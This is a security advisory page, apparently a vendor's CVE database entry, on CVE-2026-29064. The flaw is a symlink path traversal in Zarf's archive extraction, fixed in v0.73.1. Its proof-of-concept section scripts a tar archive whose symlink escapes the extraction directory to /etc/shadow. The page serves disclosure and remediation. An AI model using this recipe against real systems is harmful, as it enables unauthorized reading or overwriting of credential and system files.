Summary
A path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.
What users should do
Upgrade immediately to version v0.73.1
If developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.
If using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.
Who is affected
Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the
zarf tools archiver decompressfunctionality on generic archives.Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations.
What is the risk
A malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.
Mitigating Factors
If developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low.
Details
The archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:
- defaultHandler (on line 320): Joins
dstwithf.LinkTarget, but does not verify the resolved path stays underdst. This means that a LinkTarget of"../../../../etc/shadow"would resolve outside the destination afterfilepath.Join. - stripHandler (on line 342): Passes
f.LinkTargetverbatim toos.Symlink. - filterHandler (on line 370): Similar to
defaultHandler, the code joins but does not validate theLinkTarget.
The vulnerability is a symlink variant of the "Zip Slip" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious f.LinkTarget. When the package is extracted, os.Symlink creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.
PoC
Proof of Concept You may want to follow through these steps inside of a disposable environment (container, VM):Reproduction via zarf tools archiver decompress (simplest)
This demonstrates the vulnerability using the defaultHandler (line 320).
# 1. Create a staging directory for the malicious archive contents.
mkdir -p /tmp/cve-repro/archive-contents
# 2. Create a symlink that traverses out of the extraction directory.
# This symlink targets "../../../../../../../etc/shadow" relative to
# whatever extraction destination is chosen.
cd /tmp/cve-repro/archive-contents
ln -s ../../../../../../../etc/shadow escape-link
# 3. Also create a regular file so the archive isn't empty besides the link.
echo "benign content" > readme.txt
# 4. Package into a tar.gz archive.
# The --dereference flag is NOT used, so the symlink is stored as-is.
cd /tmp/cve-repro
tar -czf malicious.tar.gz -C archive-contents .
# 5. Verify the archive contains the symlink.
tar -tvf malicious.tar.gz
# Expected output includes:
# lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow
# 6. Create the extraction destination (deeply nested so the traversal
# resolves to a real path).
mkdir -p /tmp/cve-repro/extract/a/b/c/d
# 7. Run the vulnerable extraction.
zarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d
# 8. Verify the symlink was created pointing outside the destination.
ls -la /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: escape-link /etc/shadow
#
# The symlink target resolves to /etc/shadow, which is OUTSIDE
# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.
readlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link
# Expected: /etc/shadow
What happened: defaultHandler (line 320) executed:
os.Symlink(filepath.Join(dst, f.LinkTarget), target)
// = os.Symlink("/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow",
// "/tmp/cve-repro/extract/a/b/c/d/escape-link")
filepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.
Impact
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-29064 has a CVSS score of 8.2 (High). The vector is requires local access, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.73.1); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-29064? CVE-2026-29064 is a high-severity path traversal vulnerability in github.com/zarf-dev/zarf/src/pkg/archive (go), affecting versions >= 0.54.0, < 0.73.1. It is fixed in 0.73.1. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-29064? CVE-2026-29064 has a CVSS score of 8.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/zarf-dev/zarf/src/pkg/archive are affected by CVE-2026-29064? github.com/zarf-dev/zarf/src/pkg/archive (go) versions >= 0.54.0, < 0.73.1 is affected.
- Is there a fix for CVE-2026-29064? Yes. CVE-2026-29064 is fixed in 0.73.1. Upgrade to this version or later.
- Is CVE-2026-29064 exploitable, and should I be worried? Whether CVE-2026-29064 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-29064 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-29064? Upgrade
github.com/zarf-dev/zarf/src/pkg/archiveto 0.73.1 or later.